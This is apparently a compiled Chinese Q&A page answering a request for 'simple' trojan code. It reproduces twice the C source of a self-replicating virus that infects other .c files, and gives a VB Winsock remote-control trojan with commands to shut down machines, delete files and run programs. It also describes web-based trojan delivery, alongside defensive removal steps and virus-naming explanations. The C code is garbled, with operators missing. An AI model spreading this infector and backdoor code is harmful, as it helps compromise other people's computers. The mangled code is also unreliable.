c语言木马代码,简单点的,我保证不做违法的
#include stdio.h
#include dir.h
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
if(i=50)
{
fclose(in);
goto next;
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(in);
out=fopen(ffblk.ff_name,"w+t");
fputs("#includestdio.h\n",out);
fputs("#includedir.h\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
for(;ji-1;j++)
if(strstr(buf[j],end)==NULLstrstr(buf[j],bracket)==NULL)
fputs(buf[j],out);
else
{
if(flag==0)
{
flag=1;
fputs("virus();\n",out);
}
fputs(buf[j],out);
}
}
else if((strstr(buf[j],include[0])==NULL)
(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(ji-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);
fclose(read);
fclose(out);
printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(ffblk);
}
return 0;
}
再就是网上一百度一大堆的。
谁能解释下面简单的电脑病毒代码?
我帮你"翻译"一下代码的意思。
这是一段vbs代码:直到(除非)1等于2,否则就一直弹出一个写有"烦死你"的窗口,因为1永远不等于2,所以不断的弹窗。
这是VB的一个简单编程,但是代码却不怀好意。这段代码的意思是说,当双击运行这个程序的时候,执行以下代码:直到(除非)1等于2,否则隐藏这个软件的窗体,然后显示这个软件的窗体,然后调用系统的"calc.exe"程序,也就是调用系统自带的"计算器",因为1永远不等于2,所以这些步骤永远循环的执行下去。以现在的计算机来看,并不会"运行后马上死机",我们的计算机还不至于这么差劲,不过cpu会高涨,根据不同计算机的配置,时间范围从很快死机到数秒后死机不等。
最简单的木马 源代码以及解释
一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。
(1)硬件部分:建立木马连接所必须的硬件实体。 控制端:对服务端进行远程控制的一方。 服务端:被控制端远程控制的一方。 INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。
(2)软件部分:实现远程控制所必须的软件程序。 控制端程序:控制端用以远程控制服务端的程序。 木马程序:潜入服务端内部,获取其操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。
(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马 程序。
为什么电脑上有盗号木马?
如何识别木马
识别木马有新招,希望这篇文章对你有所帮助。
一、经常看到有玩家说,在输入自己的帐号的时候通故意输错帐号和码。其实这种木马是最早期的木马程序。现在已经很少有编木马程序的程序员,还按照这种监听键盘记录的思路去编写木马程序。现在的木马程序已经发展到通过内存提取数据来获得用户的帐号和密码。大家都知道,不管是传奇还是任何一款程序。它都是有他所特有的数据的(包括玩家的帐号、密码,等级装备资料等等)。这些数据都是会通过本机与游戏服务器取得了验证以后,玩家的角色资料才会出现在玩家的面前。而这些数据在运行的时候都是存放在计算机的内存里面的。木马作者只需要在自己的程序里面加入条件语句就可以取得玩家真实的游戏帐号、密码、角色等级~~~~~,以我自己的计算机知识,这种语句的大概意思应该是:当游戏进程进入到让玩家选择角色的时候再从内存中提取最后一次的帐号、密码、角色等级等资料。也就是说,其实玩家之前所做的故意输错帐号或密码完全是浪费自己的表情、浪费自己的时间。
下边先来说一下木马是如何通过网页进入你的电脑的,相信大家都知道,现在有很多图片木马,EML和EXE木马,其中的图片木马其实很简单,就是把木马exe文件的文件头换成bmp文件的文件头,然后欺骗IE浏览器自动打开该文件,然后利用网页里的一段JAVASCRIPT小程序调用DEBUG把临时文件里的bmp文件还原成木马exe文件并拷贝到启动项里,接下来的事情很简单,你下次启动电脑的时候就是你噩梦的开始了,EML木马更是传播方便,把木马文件伪装成audio/x-wav声音文件,这样你接收到这封邮件的时候只要浏览一下,不需要你点任何连接,windows就会为你代劳自动播放这个他认为是wav的音乐文件,木马就这样轻松的进入你的电脑,这种木马还可以frame到网页里,只要打开网页,木马就会自动运行,另外还有一种方法,就是把木马exe编译到.JS文件里,然后在网页里调用,同样也可以无声无息的入侵你的电脑,这只是些简单的办法,还有远程控制和共享等等漏洞可以钻,知道这些,相信你已经对网页木马已经有了大概了解,
简单防治的方法:
开始-设置-控制面版-添加删除程序-windows安装程序-把附件里的windows scripting host去掉,然后打开Internet Explorer浏览器,点工具-Internet选项-安全-自定义级别,把里面的脚本的3个选项全部禁用,然后把“在中加载程序和文件”禁用,当然这只是简单的防治方法,不过可能影响一些网页的动态java效果,不过为了安全就牺牲一点啦,这样还可以预防一些恶意的网页炸弹和病毒,如果条件允许的话可以加装防火墙,再到微软的网站打些补丁,反正我所知道的网吧用的都是原始安装的windows,很不安全哦,还有尽量少在一些小网站下载一些程序,尤其是一些号称黑客工具的软件,小心盗不着别人自己先被盗了,当然,如果你执意要用的话,号被盗了也应该付出这个代价吧。还有,不要以为装了还原精灵就很安全,据我所知,一般网吧的还原精灵都只还原c:盘即系统区,所以只要木马直接感染你安装在别的盘里的游戏执行文件,你照样逃不掉的。
下边介绍一下木马和如何简单的检查一下是否中了木马。
木马程序一般分为服务器端程序和客户端程序两个部分,当服务器端程序安装在某台连接到网络的电脑后,就能使用客户端程序对其进行登陆。这和PcAnywhere以及NetMeeting的远程控制功能相似。但不同的是,木马是非法取得对对方电脑的控制权,一旦登陆成功,就可以取得管理员级的权利,对方电脑上的资料、密码等是一览无余。不过这种木马一般的“伪黑客”很少使用,因为一不小心就会引火上身,被对方反查过来就会偷鸡不成蚀把米了,一般他们都会采用只有服务器端的小木马,这类木马通常会把截取的密码发到一个免费邮箱里,不需要人为操作,有空去收趟邮件就可以了,这种木马遍布互连网的各个角落,的确防不胜防,由于木马程序众多,加之不断有新版本、新品种产生,使得软件无法完全应付,所以手动检查清除是十分必要的。
木马会想尽一切办法隐藏自己,别指望在任务管理器里看到他们的踪影,有些木马更是会和一些系统进程寄生在一起的,如著名的广外幽灵就是寄生在MsgSrv32.exe里;当然它也会悄无声息地启动,木马会在每次用户启动windows时自动装载服务端,Windows系统启动时自动加载应用程序的方法木马都会用上,如启动组、win.ini、system.ini、注册表等等都是木马藏身之地;下边简单说一下如何检查,点开始-运行,输入:
msconfig回车 就会打开系统配置实用程序,先点system.ini,看看shell=文件名,正确的文件名应该是“explorer.exe”,如果explorer.exe后边还跟有别的程序的话,就要好好检查这个程序了,然后点win.ini,“run=”和“load=”是可能加载“木马”程序的途径,一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了,当然你也得看清楚,因为如“AOL木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件;最后点“启动”,检查里面的启动项是不是有不熟悉的,如果你实在不清楚的话可以把他们全部取消,然后重新运行msconfig,看一下有没有取消的启动项重新被选中的,一般木马都会存在于内存中,(就是线程插入,然后隐藏进程的木马,DLL无进程木马就不会驻留在内存里面,我们在下一次中会讲到)所以发现你取消他的启动项就会自动添加上的,然后你就可以逐步添上你的输入法,音量控制,防火墙等软件的启动项了;还有一类木马,他是关联注册表的文件打开方式的,一般木马经常关联.exe,点开始-运行,输入:regedit回车,打开注册表编辑器,点第一条,也就是HKEY_CLASSES_ROOT,找到exefile,看一下\\exefile\\shell\\open\\command里面的默认键值是不是"%1" %* ,如果是一个程序路径的话就一定是中木马了,另外配合两种以上的杀毒软件也是必要的,另外在windows下木马一般很难清除,最后重新启动到dos环境下再进行查杀。
防木马程序、防火墙、及杀毒软件介绍:
1、木马克星: 专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!
2、绿鹰PC万能精灵2.91 :专业的个人版木马查杀工具;近100%查杀各种类型木马!玩家推荐反木马品牌~!
3、Symantec AntiVirus:这个我就不用再介绍了吧,全球最大的杀毒软件!强力推荐8.1企业版。
4、天网防火墙2.51个人版:天网防火墙个人版在网络效率与系统安全上完全采用天网防火墙的设计思想,采用最底层的网络驱动隔绝,其作用层在网络硬件与Windows网络驱动之间,在黑客攻击数据接触Windows网络驱动之前将所有的攻击数据拦截,保护脆弱的Windows网络驱动不会崩溃
看看这个,是用VB编的木马程序
1.“特洛伊木马”有被称为BO, 是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实是一种客户机/服务器程序,其利用的原理就是:在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端(即被攻击的计算机)的服务器程序,就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。
使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。
在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:
Private Sub cmdConnect_Click()
If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
MsgBox ("请输入主机名或主机IP地址。")
Exit Sub
Else
If Len(Text1.Text) 0 Then
tcpClient.RemoteHost = Text1.Text
Else
tcpClient.RemoteHost = Text2.Text
End If
End If
tcpClient.Connect
Timer1.Enabled = True
End Sub
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:
Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub
准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:
Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
If tcpServer.State sckClosed Then
tcpServer.Close‘检查控件的 State 属性是否为关闭的。
End If ’如果不是,在接受新的连接之前先关闭此连接。
tcpServer.Accept requestID
End Sub
这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。
2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:
Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)
Dim strData As String
Dim i As Long
Dim mKey As String
tcpServer.GetData strData
‘接收数据并存入strData
For i = 1 To Len(strData)
‘分离strData中的命令
If Mid(strData, i, 1) = "@" Then
mKey = Left(strData, i - 1)
‘把命令ID号存入mKey
‘把命令参数存入strData
strData = Right(strData, Len(strData) - i)
Exit For
End If
Next i
Select Case Val(mKey)
Case 1
‘驱动器名、目录名、文件名
Case 2
强制关闭服务器端的计算机
Case 3
强制重启服务器端的计算机
Case 4
屏蔽任务栏窗口;
Case 5
屏蔽开始菜单;
Case 6
按照客户机端传过来的文件名或目录名,而删除它;
Case 7
屏蔽热启动键;
Case 8
运行服务器端的任何程序
End Select
End Sub
详细程序略。
客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。
另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:
Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub
这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中方法,是修改系统注册表的方法。
这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中方法,是修改系统注册表的方法。
成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要解决。警告:千万不要用BO程序破坏别人的系统。
提示C:\Windows\System32\wbem\WmiPrvSE.exe木马。。迫使QQ下线盗号。。
解决方法如下: 1.建议使用XDelBox删除以下文件(如果存在): (使用说明:解压安装在系统盘区根目录,删除时一次过复制所有要删除文件的路径,在待删除文件列表里点击右键选择剪贴板导入不检查路径,导入后在要删除文件上点击右键,选择立刻重启删除,这个时候系统会重启并进入到XDelBox 启动菜单。不用自己选中。让XDelBox自己执行。删除完毕会再次重启进入正常系统。运行xdelbox前最好卸载所有可移动存储设备) C:\WINDOWS\system32\drivers\Knlrun.sys C:\WINDOWS\system32\drivers\Entech.sys 2.删除重启后使用SREng修复下面各项: 启动项目 -- 服务-- 驱动程序之如下项删除: (使用说明:SREng-启动项目-服务-驱动程序中"选中"隐藏已认证的微软项目"然后删除下面名称的驱动程序(选中有问题的驱动后,点"删除服务",点"设置"按钮即可。注意弹出的窗口中要点"否NO"才是确认删除服务) knlrun/knlrun ENTECH/ENTECH
盗号木马分为哪几类,描述下
最近很多人中了木马群cmdbcs.exe,wsttrs.exe,msccrt.exe,winform.exe,upxdnd.exe等 这个应该是通过木马下载器下载所致 这些基本上都是些盗号木马
一般sreng日志表现如下
启动项目里 (不一定全)
wsttrsC:\windows\wsttrs.exe [Microsoft Corporation]
svcC:\DOCUME~1\用户名\LOCALS~1\Temp\byetmr.exe [Microsoft Corporation]
g1qC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rundl132.exe []
upxdndC:\DOCUME~1\用户名\LOCALS~1\Temp\upxdnd.exe [Microsoft Corporation]
winformC:\WINDOWS\winform.exe [N/A]
upxdndC:\DOCUME~1\用户名\LOCALS~1\Temp\upxdnd.exe [N/A]
cmdbcsC:\WINDOWS\cmdbcs.exe [N/A]
mppdsC:\WINDOWS\mppds.exe [N/A]
nortonqC:\WINDOWS\nortonq.exe []
SystemC:\Program Files\Common Files\System\Updaterun.exe [N/A]
5cl3vC:\DOCUME~1\用户名\LOCALS~1\Temp\servicer.exe []
mppdysC:\WINDOWS\mppdys.exe []
mhsaC:\DOCUME~1\用户名\LOCALS~1\Temp\mhso.exe []
msccrtC:\WINDOWS\msccrt.exe []
wgs3C:\WINDOWS\wgs3.exe []
wms3C:\WINDOWS\wms3.exe []
twinC:\WINDOWS\system32\twunk32.exe []
wsttrsrem c:\windows\wsttrs.exe []
另外
C:\WINDOWS\mppds.exe
C:\WINDOWS\winform.exe
c:\windows\wsttrs.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\msccrt.exe
C:\WINDOWS\nortonq.exe等病毒每个会释放一个dll 插入explorer等进程
解决办法
如果在进程里看见了类似情况
请按照以下步骤操作
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
启动项目 注册表 删除如下项目 (有哪个删哪个)
wsttrsC:\windows\wsttrs.exe [Microsoft Corporation]
winformC:\WINDOWS\winform.exe [N/A]
cmdbcsC:\WINDOWS\cmdbcs.exe [N/A]
mppdsC:\WINDOWS\mppds.exe [N/A]
SystemC:\Program Files\Common Files\System\Updaterun.exe [N/A]
ravshellC:\WINDOWS\system32\SVCH0ST.EXE [N/A]
svcC:\DOCUME~1\用户名\LOCALS~1\Temp\byetmr.exe [Microsoft Corporation]
mppdysC:\WINDOWS\mppdys.exe []
nortonqC:\WINDOWS\nortonq.exe []
msccrtC:\WINDOWS\msccrt.exe []
wgs3C:\WINDOWS\wgs3.exe []
wms3C:\WINDOWS\wms3.exe []
twinC:\WINDOWS\system32\twunk32.exe []
wsttrsrem c:\windows\wsttrs.exe []
以及所有的Temp文件夹下的文件建立的启动项目
然后
删除上述对应文件
和C:\WINDOWS\system32\wsttrs.dll
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\system32\mppdys.dll
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\wsttrs.dll
C:\WINDOWS\system32\nortonq.dll
如果装有QQ请把QQ 安装文件夹中的Timplatform.exe删除 把Timplatfrom.exe重命名为Timplatform.exe
如果哪位网友有发现新情况可以和我交流 我会及时补充
另:添加几个最近流行病毒的解决办法
1 一个不断使电脑发出“当”或者“咚”的声音的病毒
解决方案:
重启计算机进入
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
TomDemoService / TomDemoService
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
然后删除
C:\config.exe
2.SysLoad3.exe (Worm.DlOnlineGames)
3.调用cmd.exe狂占系统资源的病毒
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Windows SystemDown / WindowsDown
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
然后删除C:\WINDOWS\system32\servet.exe
建议用木马克星+卡巴+360围杀,定期升级病毒库;不乱开网页
关于木马的知识
随便发点吧
很多时候大家已经用杀毒软件查出了自己的机子中了例如Backdoor. RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名,这时有些人就懵了,那么长一串的名字,我怎么知道是什么病毒啊?
其实只要我们掌握一些病毒的命名规则,我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些公有的特性了。
世界上那么多的病毒,反病毒公司为了方便管理,他们会按照病毒的特性,将病毒进行分类命名。虽然每个反病毒公司的命名规则都不太一样,但大体都是采用一个统一的命名方法来命名的。
一般格式为:病毒前缀.病毒名.病毒后缀 。
病毒前缀是指一个病毒的种类,他是用来区别病毒的种族分类的。不同的种类的病毒,其前缀也是不同的。比如我们常见的木马病毒的前缀 Trojan ,蠕虫病毒的前缀是 Worm 等等还有其他的。
病毒名是指一个病毒的家族特征,是用来区别和标识病毒家族的,如以前著名的CIH病毒的家族名都是统一的“ CIH ”,还有近期闹得正欢的振荡波蠕虫病毒的家族名是“ Sasser ”。
病毒后缀是指一个病毒的变种特征,是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示,如Worm.Sasser.b就是指 振荡波蠕虫病毒的变种B,因此一般称为 “振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多(也表明该病毒生命力顽强 ^_^),可以采用数字与字母混合表示变种标识。
综上所述,一个病毒的前缀对我们快速的判断该病毒属于哪种类型的病毒是有非常大的帮助的。通过判断病毒的类型,就可以对这个病毒有个大概的评估(当然这需要积累一些常见病毒类型的相关知识,这不在本文讨论范围)。而通过病毒名我们可以利用查找资料等方式进一步了解该病毒的详细特征。病毒后缀能让我们知道现在在你机子里呆着的病毒是哪个变种。
下面附带一些常见的病毒前缀的解释(针对我们用得最多的Windows操作系统):
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
3、木马病毒、黑客病毒
木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60 。这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如:网络枭雄(Hack.Nether.Client)等。
4、脚本病毒
脚本病毒的前缀是:Script。脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)——可不是我们的老大代码兄哦^_^。脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
5、宏病毒
其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。宏病毒的前缀是:Macro,第二前缀是:Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀,格式是:Macro.Word97;凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀,格式是:Macro.Excel97;凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀,格式是:Macro.Excel,依此类推。该类病毒的公有特性是能感染OFFICE系列文档,然后通过OFFICE通用模板进行传播,如:著名的美丽莎(Macro.Melissa)。
6、后门病毒
后门病毒的前缀是:Backdoor。该类病毒的公有特性是通过网络传播,给系统开后门,给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot 。
7、病毒种植程序病毒
这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。如:冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。
8.破坏性程序病毒
破坏性程序病毒的前缀是:Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。
9.玩笑病毒
玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girlghost)病毒。
10.捆绑机病毒
捆绑机病毒的前缀是:Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来,表面上看是一个正常的文件,当用户运行这些捆绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑在一起的病毒,从而给用户造成危害。如:捆绑QQ(Binder.QQPass.QQBin)、系统杀手(Binder.killsys)等。以上为比较常见的病毒前缀,有时候我们还会看到一些其他的,但比较少见,这里简单提一下:
DoS:会针对某台主机或者服务器进行DoS攻击;
Exploit:会自动通过溢出对方或者自己的系统漏洞来传播自身,或者他本身就是一个用于Hacking的溢出工具;
HackTool:黑客工具,也许本身并不破坏你的机子,但是会被别人加以利用来用你做替身去破坏别人。
你可以在查出某个病毒以后通过以上所说的方法来初步判断所中病毒的基本情况,达到知己知彼的效果。在杀毒无法自动查杀,打算采用手工方式的时候这些信息会给你很大的帮助。
c语言木马源代码
#include stdio.h
#include dir.h
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
if(i=50)
{
fclose(in);
goto next;
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(in);
out=fopen(ffblk.ff_name,"w+t");
fputs("#includestdio.h\n",out);
fputs("#includedir.h\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
for(;ji-1;j++)
if(strstr(buf[j],end)==NULLstrstr(buf[j],bracket)==NULL)
fputs(buf[j],out);
else
{
if(flag==0)
{
flag=1;
fputs("virus();\n",out);
}
fputs(buf[j],out);
}
}
else if((strstr(buf[j],include[0])==NULL)
(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(ji-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);
fclose(read);
fclose(out);
printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(ffblk);
}
return 0;
}
严重声明:这个程序只是供C语言新手参考,开玩笑没关系,但如果用来做不法的事情,本人概不负责。还有,编病毒、木马去做违法的事情惩罚是很重的,你如果想学编程,编个简单的就好了,否则后果很严重。